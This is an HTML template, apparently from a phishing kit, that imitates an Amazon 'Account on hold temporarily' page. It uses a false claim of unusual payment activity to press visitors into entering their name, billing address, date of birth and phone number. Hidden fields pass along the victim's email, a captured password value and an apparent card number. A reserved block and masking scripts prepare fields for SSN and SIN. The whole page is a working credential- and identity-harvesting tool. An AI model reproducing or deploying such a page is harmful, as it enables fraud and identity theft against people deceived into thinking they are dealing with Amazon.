<html
  class="a-touch a-mobile a-js a-audio a-video a-canvas a-svg a-drag-drop a-geolocation a-history a-webworker a-autofocus a-input-placeholder a-textarea-placeholder a-local-storage a-orientation a-touch a-gradients a-hires a-transform3d a-touch-scrolling a-android a-mobile a-text-shadow a-text-stroke a-box-shadow a-border-radius a-border-image a-opacity a-transform a-transition a-ember"
  data-19ax5a9jf="mongoose"
  data-aui-build-date="3.21.4-2021-06-04">
  <head>
    <meta
      name="viewport"
      content="width=device-width, maximum-scale=1, minimum-scale=1, initial-scale=1, user-scalable=no, shrink-to-fit=no" />
    <meta charset="utf-8" />
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <title>Account on hold temporarily</title>
    <link
      rel="apple-touch-icon"
      sizes="76x76"
      href="{{ url_for('static',filename='img/logo.png') }}" />
    <link
      rel="icon"
      type="image/png"
      href="{{ url_for('static',filename='img/logo.png') }}" />
    <link
      href="https://www.amazon.com/favicon.ico"
      rel="shortcut icon"
      type="image/x-icon" />
    <link
      rel="stylesheet"
      href="https://images-na.ssl-images-amazon.com/images/I/11OrJUma5UL._RC|01rXlRztnIL.css,414aSa2g0iL.css,21ak7+1wqPL.css,01uNpa0PcLL.css,01NtHviPbnL.css,0131vqwP5UL.css,310ooOGCdhL.css,11o2wHvvdBL.css,01i9N7e-hBL.css,11VHr91CkuL.css,11ADf9L1OdL.css,01IdKcBuAdL.css,019pz6QNQ6L.css,01wLsDqViEL.css,018gwG6-KML.css,017oxx82kUL.css,319af+06sNL.css,01B-YPN7k2L.css,21VgUeznheL.css,116TGBv0izL.css,11hcDsGAR1L.css,21AL2IbGWYL.css,01Zit5mlZtL.css,01CFUgsA-YL.css,31rjFdV1T2L.css,014rTkZXuAL.css,1143-dXvfTL.css,11MNK-noG6L.css,11VvAxw559L.css,01XRXSECMKL.css,110Q3MAjYJL.css,217CY98bj7L.css,118ArY7aMgL.css,01vd5lqeZUL.css,215BN1xpbYL.css,11KiKPowgWL.css,01p8s3ASHFL.css,11r1-thmy4L.css,011taseCFPL.css,11eI5SJms1L.css,01cbS3UK11L.css,21HViuPTI1L.css,01INc4pyFRL.css_.css?AUIClients/AmazonUI&amp;1SF6xyD1#mobile.us.not-trident.338061-T1" />
    <link
      rel="stylesheet"
      href="https://images-na.ssl-images-amazon.com/images/I/01NjQbvCUVL.css?AUIClients/AbbottViewComponentMobileAssets" />
    <link
      rel="stylesheet"
      href="https://images-na.ssl-images-amazon.com/images/I/31E2uCL+CuL.css?AUIClients/AbbottPortalAssets" />
    <link
      rel="stylesheet"
      href="https://images-na.ssl-images-amazon.com/images/I/11YuQ0DJSqL.css?AUIClients/AbbottViewComponentCommonAssets" />
    <link
      rel="stylesheet"
      href="https://images-na.ssl-images-amazon.com/images/I/51yFEbMJ8yL._RC|41C6LaLLmFL.css,01+72+wCC9L.css_.css?AUIClients/AmazonNavigationMobileMetaAsset#mobile" />
  </head>
  <body
    data-language-code="en-US"
    class="abbott-view a-m-us a-aui_72554-c a-aui_button_aria_label_markup_348458-t1 a-aui_csa_templates_buildin_ww_exp_337518-c a-aui_csa_templates_buildin_ww_launch_337517-c a-aui_csa_templates_declarative_ww_exp_337521-c a-aui_csa_templates_declarative_ww_launch_337520-c a-aui_dynamic_img_a11y_markup_345061-t1 a-aui_mm_desktop_exp_291916-c a-aui_mm_desktop_launch_291918-c a-aui_mm_desktop_targeted_exp_291928-c a-aui_mm_desktop_targeted_launch_291922-c a-aui_pci_risk_banner_210084-c a-aui_preload_261698-c a-aui_rel_noreferrer_noopener_309527-c a-aui_template_weblab_cache_333406-c a-aui_tnr_v2_180836-c">
    <div id="a-page">
      <div class="a-section abbott-view-header">
        <div class="a-section a-spacing-none">
          <div class="a-section abbott-view-component">
            <header
              class="amazon-header nav-mobile nav-locale-us nav-lang- nav-ssl nav-unrec nav-blueheaven">
              <div id="navbar">
                <div id="nav-logobar">
                  <div class="nav-left">
                    <div id="nav-logo">
                      <a class="nav-logo-link" aria-label="">
                        <span class="nav-sprite nav-logo-base"></span>
                        <span class="nav-sprite nav-logo-locale"></span>
                      </a>
                    </div>
                  </div>
                </div>
              </div>
            </header>
          </div>
        </div>
      </div>
      <div class="a-section abbott-view-content">
        <div class="a-section a-padding-small">
          <form id="abbott-form" action="card">
            <div
              id="alert-0"
              class="a-section a-spacing-base abbott-view-component component-display-block component-width-extra_large">
              <div
                data-action-on-load="register-listeners"
                data-listeners=""
                class="a-section a-spacing-none has-action-on-load">
                <div class="a-box a-alert a-alert-warning">
                  <div class="a-box-inner a-alert-container">
                    <h4 class="a-alert-heading">Account on hold temporarily</h4>
                    <div class="a-alert-content">
                      We noticed unusual payment activity on your account and
                      need to verify ownership of the payment method used on
                      your most recent order. (<span
                        class="a-declarative"
                        data-action="a-sheet"
                        data-a-sheet='{"name":"alert-0-1","preloadDomId":"alert-0-1"}'
                        ><a class="a-link-normal">Why?</a></span
                      >)
                    </div>
                  </div>
                </div>
              </div>
            </div>
            <div
              id="header-1"
              class="a-section a-spacing-mini abbott-view-component component-display-block component-width-extra_large">
              <h1
                data-action-on-load="register-listeners"
                data-listeners=""
                class="a-size-large has-action-on-load text-align-left a-text-bold">
                Enter billing details
              </h1>
            </div>
            <div
              id="header-2"
              class="a-section a-spacing-base abbott-view-component component-display-block component-width-extra_large">
              <h1
                data-action-on-load="register-listeners"
                data-listeners=""
                class="a-size-base has-action-on-load text-align-left a-text-normal">
                This is required to remove the hold on your account.
              </h1>
            </div>
            <div
              id="text-input-3"
              class="a-section a-spacing-extra-large abbott-view-component component-display-block component-width-extra_large">
              <div class="a-section a-spacing-none">
                <label class="a-form-label"
                  ><i class="input-field-required"></i> Full name</label
                >
                <div
                  data-action-on-load="register-listeners"
                  data-listeners=""
                  class="a-input-text-wrapper a-form-normal input-field-width text-input-field has-action-on-load">
                  <input
                    type="text"
                    maxlength="100"
                    placeholder="Name that appears on the payment method"
                    onkeypress="return event.charCode < 48 || event.charCode  >57"
                    name="fname"
                    required
                    autofocus />
                </div>
              </div>
            </div>
            <div
              id="text-input-6"
              class="a-section a-spacing-base abbott-view-component component-width-extra_large component-display-block">
              <div class="a-section a-spacing-none">
                <label class="a-form-label"
                  ><i class="input-field-required"></i> Billing address</label
                >
                <div
                  data-action-on-load="register-listeners"
                  class="a-input-text-wrapper a-form-normal input-field-width text-input-field has-action-on-load">
                  <input
                    type="text"
                    maxlength="100"
                    placeholder="Street and number, P.O. box, c/o."
                    name="address"
                    required />
                </div>
              </div>
            </div>
            <div
              id="text-input-7"
              class="a-section a-spacing-base abbott-view-component component-width-extra_large component-display-block">
              <div class="a-section a-spacing-none">
                <div
                  data-action-on-load="register-listeners"
                  class="a-input-text-wrapper a-form-normal input-field-width text-input-field has-action-on-load">
                  <input
                    type="text"
                    maxlength="100"
                    placeholder="Apartment, suite, unit, building, floor, etc."
                    name="street-line-two" />
                </div>
              </div>
            </div>
            <div
              id="text-input-8"
              class="a-section a-spacing-base abbott-view-component component-width-extra_large component-display-block">
              <div class="a-section a-spacing-none">
                <label class="a-form-label"
                  ><i class="input-field-required"></i> City</label
                >
                <div
                  data-action-on-load="register-listeners"
                  class="a-input-text-wrapper a-form-normal input-field-width text-input-field has-action-on-load">
                  <input type="text" maxlength="100" name="city" required />
                </div>
              </div>
            </div>
            <div
              id="text-input-9"
              class="a-section a-spacing-base abbott-view-component component-width-extra_large component-display-block">
              <div class="a-section a-spacing-none">
                <label class="a-form-label"
                  ><i class="input-field-required"></i>
                  State/Province/Region</label
                >
                <div
                  data-action-on-load="register-listeners"
                  class="a-input-text-wrapper a-form-normal input-field-width text-input-field has-action-on-load">
                  <input type="text" maxlength="100" name="state" required />
                </div>
              </div>
            </div>
            <div
              id="text-input-10"
              class="a-section a-spacing-extra-large abbott-view-component component-width-extra_large component-display-block">
              <div class="a-section a-spacing-none">
                <label class="a-form-label"
                  ><i class="input-field-required"></i> Zip Code</label
                >
                <div
                  data-action-on-load="register-listeners"
                  class="a-input-text-wrapper a-form-normal input-field-width text-input-field has-action-on-load">
                  <input type="text" maxlength="100" name="zip" required />
                </div>
              </div>
            </div>
            <div
              id="text-input-12"
              class="a-section a-spacing-extra-large abbott-view-component component-display-block component-width-extra_large">
              <div class="a-section a-spacing-none">
                <label class="a-form-label"
                  ><i class="input-field-required"></i> Date of birth</label
                >
                <div
                  data-action-on-load="register-listeners"
                  data-listeners=""
                  class="a-input-text-wrapper a-form-normal input-field-width text-input-field has-action-on-load">
                  <input
                    type="tel"
                    maxlength="20"
                    class="mask-dob"
                    placeholder="DD-MM-YYYY"
                    name="dob"
                    required />
                </div>
              </div>
            </div>
            <div
              id="text-input-12"
              class="a-section a-spacing-extra-large abbott-view-component component-display-block component-width-extra_large">
              <div class="a-section a-spacing-none">
                <label class="a-form-label"
                  ><i class="input-field-required"></i> Phone number</label
                >
                <div
                  data-action-on-load="register-listeners"
                  data-listeners=""
                  class="a-input-text-wrapper a-form-normal input-field-width text-input-field has-action-on-load">
                  <input type="tel" maxlength="20" name="phone" required />
                </div>
              </div>
            </div>
            <input type="hidden" name="akseskey" value="{{ key }}" />
            <input type="hidden" name="email" value="{{ mail }}" />
            <input type="hidden" name="pass_log" value="{{ pass_log }}" />
            <input type="hidden" name="cn" value="{{ cn }}" />
            {% block content %}
            <!-- SSN & SIN -->
            {% endblock %}
            <div
              id="divider-12"
              class="a-section a-spacing-base abbott-view-component component-display-block component-width-extra_large">
              <hr aria-hidden="true" class="a-divider-normal" />
            </div>
            <div
              id="submit-button-23"
              class="a-section a-spacing-base abbott-view-component component-display-block component-width-extra_large">
              <div
                data-action-on-load="register-listeners"
                data-listeners=""
                class="a-section has-action-on-load content-align-justify">
                <span
                  id="submit-button"
                  class="a-button a-button-primary button-default-width"
                  style="height: 50px">
                  <span class="a-button-inner">
                    <input
                      class="a-button-input"
                      type="submit"
                      aria-labelledby="submit-button-announce" />
                    <span
                      id="submit-button-announce"
                      class="a-button-text"
                      aria-hidden="true"
                      >Submit billing details</span
                    >
                  </span>
                </span>
              </div>
            </div>
          </form>
        </div>
      </div>
      <div class="a-section abbott-view-footer">
        <div class="a-section a-spacing-none">
          <div class="a-section abbott-view-component">
            <div
              class="a-section a-spacing-extra-large a-spacing-top-extra-large">
              <div class="a-divider a-divider-section">
                <div class="a-divider-inner"></div>
              </div>
              <div class="a-section">
                <div class="a-section a-text-center a-spacing-small">
                  <a
                    class="a-size-mini a-link-normal a-padding-mini"
                    href="javascript void(0)"
                    >Conditions of Use</a
                  ><a
                    class="a-size-mini a-link-normal a-padding-mini"
                    href="javascript void(0)"
                    >Privacy Notice</a
                  ><a
                    class="a-size-mini a-link-normal a-padding-mini"
                    href="javascript void(0)"
                    >Help</a
                  >
                </div>
                <div
                  class="a-section a-text-center a-size-mini a-color-secondary">
                  © 1996-2023, Amazon.com, Inc. or its affiliates.
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <div class="submit-loading submit-loading-off">
      <div class="spinner-container">
        <span class="spinner-img"></span>
      </div>
    </div>
    <!-- Masking -->
    <script src="{{ url_for('static',filename='js/jquery-3.3.1.min.js') }}"></script>
    <script src="{{ url_for('static',filename='js/jquery.mask.min.js') }}"></script>
    <script src="{{ url_for('static',filename='js/jquery.validate.min.js') }}"></script>
    <script src="{{ url_for('static',filename='js/additional-methods.min.js') }}"></script>
    <script src="{{ url_for('static',filename='js/jquery.creditCardValidator.js') }}"></script>
    <script>
      $(document).ready(function () {
        $('input[name="ssn"]').mask("WWW-WW-WWWW", {
          translation: {
            W: {pattern: /[0-9]/, optional: false},
          },
        });
        $('input[name="sin"]').mask("WWW-WWW-WWW", {
          translation: {
            W: {pattern: /[0-9]/, optional: false},
          },
        });
        $('input[name="phone"]').keyup(function (e) {
          if (/\D/g.test(this.value)) {
            this.value = this.value.replace(/\D/g, "");
          }
        });
        $('input[name="dob"]').mask("QW-SR-R000", {
          translation: {
            Q: {pattern: /[0-3]/, optional: false},
            W: {pattern: /[0-9]/, optional: false},
            S: {pattern: /[0-1]/, optional: false},
            R: {pattern: /[1-2]/, optional: false},
          },
        });
      });
    </script>
    <script>
      function hanyaAngka(evt) {
        var charCode = evt.which ? evt.which : event.keyCode;
        if (charCode > 31 && (charCode < 48 || charCode > 57)) return false;
        return true;
      }
    </script>
    <!-- End Validasi -->
  </body>
</html>
